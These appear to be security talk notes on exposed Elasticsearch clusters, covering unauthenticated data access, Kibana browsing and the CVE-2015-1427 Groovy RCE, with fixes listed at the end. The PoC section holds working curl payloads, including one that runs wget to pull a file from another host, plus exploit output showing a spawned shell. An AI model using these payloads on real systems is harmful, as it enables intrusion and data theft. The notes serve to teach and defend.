DevOoops: Elasticsearch

Notes from the Devoops talk on Elastic Search

Elasticsearch Provides a distributed, multitenant-capable full-text search engine with a RESTful web interface and schema-free JSON documents.

GET request to port 9200 will show version

"version" : {

"number" : "1.2.4"

No Authentication (initially)

Can search stored data via HTTP API

Update data with PUT request

Join an open cluster and receive all data

RCE prior to 1.2.0 (CVE-2014-3120)
RCE prior to 1.5.0* (CVE-2015-1427)

exploit/multi/elasticsearch/script_mvel_rce

Kibana

Searching via curl/browser is cumbersome...Kibana FTW

http://www.elasticsearch.org/overview/kibana/

Edit config.js to point to open Elasticsearch

Open index.html in local browser or host on a server

Viewing the content of the document

Import your own data and visualize

Elasticsearch solutions:

Apply authentication if possible

-->https://www.elastic.co/products/shield

Segment elasticsearch from Corp (and the public in general)

Be aware of the data you put in elasticsearch

-->anyone can search it

Logs Logs Logs

osquery

https://www.elastic.co/blog/protecting-against-attacks-that-hold-your-data-for-ransom

http://code972.com/blog/2017/01/107-dont-be-ransacked-securing-your-elasticsearch-cluster-properly

ElasticSearch CVE-2015-1427 RCE Exploit

References:
https://www.elastic.co/blog/elasticsearch-1-4-3-and-1-3-8-released/
https://jordan-wright.github.io/blog/2015/03/08/elasticsearch-rce-vulnerability-cve-2015-1427/
http://www.theregister.co.uk/2015/03/10/elastic_search_vuln/?mt=1426090760048

Since the exploit is  already out here [XiphosResearch github] and here [in a comment :-) ] and here [Metasploit pull request]

POC's

curl http://localhost:9200/_search?pretty -XPOST -d '{"script_fields": {"myscript": {"script": "java.lang.Math.class.forName(\"java.lang.System\").getProperty(\"os.name\")"}}}'

curl http://localhost:9200/_search?pretty -XPOST -d '{"script_fields": {"myscript": {"script": "java.lang.Math.class.forName(\"java.lang.Runtime\") getRuntime() exec(\"wget -O /tmp/testy http://192.168.1.1:8080/es_test.txt\")"}}}'

$ cat /tmp/testy
It worked :-)

---

python elastic_shell.py 127.0.0.1
--snip--
Exploit for ElasticSearch , CVE-2015-1427   Version: 20150309.1
{*} Spawning Shell on target... Do note, its only semi-interactive... Use it to drop a better payload or something
~$ ls
elasticsearch
elasticsearch-service-mgr.exe
elasticsearch-service-x64.exe
elasticsearch-service-x86.exe
elasticsearch.bat
elasticsearch.in.bat
elasticsearch.in.sh
plugin
plugin.bat
service.bat
~$

To fix disable groovy scripting in config/elasticsearch.yml and upgrade to 1.4.3+


script.groovy.sandbox.enabled: false